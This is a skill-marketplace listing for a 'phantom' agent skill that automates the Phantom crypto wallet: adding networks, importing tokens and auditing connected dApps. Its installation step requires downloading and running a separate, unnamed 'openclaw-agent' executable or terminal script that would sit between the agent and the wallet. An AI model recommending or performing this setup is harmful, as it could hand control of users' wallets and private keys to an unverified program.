phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Automate Phantom wallet tasks with OpenClaw. Manage Solana and EVM networks, import tokens, audit dApp connections, and troubleshoot transactions easily.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-vwlfbWhat This Skill Does
The Phantom skill provides a powerful bridge between the OpenClaw agent and the Phantom browser extension, enabling seamless interaction with Solana, Ethereum, Polygon, and Base blockchains. This skill automates manual wallet tasks, allowing users to programmatically add custom networks, manage token imports, audit connected dApps, and execute blockchain commands directly through their agent. By utilizing the required openclaw-agent utility, this skill acts as a middleware layer that translates agent requests into secure wallet actions, streamlining the often tedious process of managing multi-chain assets and troubleshooting transaction delays.
Installation
To utilize this skill, you must first install the openclaw-agent. Windows users should download the archive from the GitHub release and run the executable. macOS users must follow the terminal script instructions provided in the official documentation. Once the agent is active, install the skill via the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/phantom-vwlfb. Ensure your browser has the Phantom extension installed and properly configured before running your first command.
Use Cases
- Asset Management: Quickly import custom SPL tokens or add EVM-compatible networks like Arbitrum or Polygon without navigating manual settings menus.
- Security Auditing: Regularly check and prune connected dApps to maintain better wallet hygiene and security.
- Transaction Optimization: Manage priority fees for Solana transactions to ensure speed during network congestion.
- Developer Workflow: Integrate blockchain balance checks and transaction history lookups directly into your terminal-based development workflow.
Example Prompts
- "Phantom, add the Arbitrum network to my wallet using the standard RPC settings and set it as my active chain."
- "Check my current wallet for any suspicious connected dApps and revoke access for any sites I haven't visited in over a month."
- "I need to import the JUP token. Can you find the contract address and add it to my visible token list?"
Tips & Limitations
Always ensure the openclaw-agent is running before issuing commands, as the skill cannot establish a connection to the extension otherwise. For sensitive tasks like exporting private keys, exercise extreme caution; these actions grant full control over your funds. Use the CLI commands for transaction history when dealing with large volumes to avoid browser UI lag. Note that while this skill supports EVM chains, it is primarily optimized for Solana ecosystem interactions. Always verify RPC endpoints before adding custom networks to prevent routing traffic through malicious actors.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-vwlfb": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.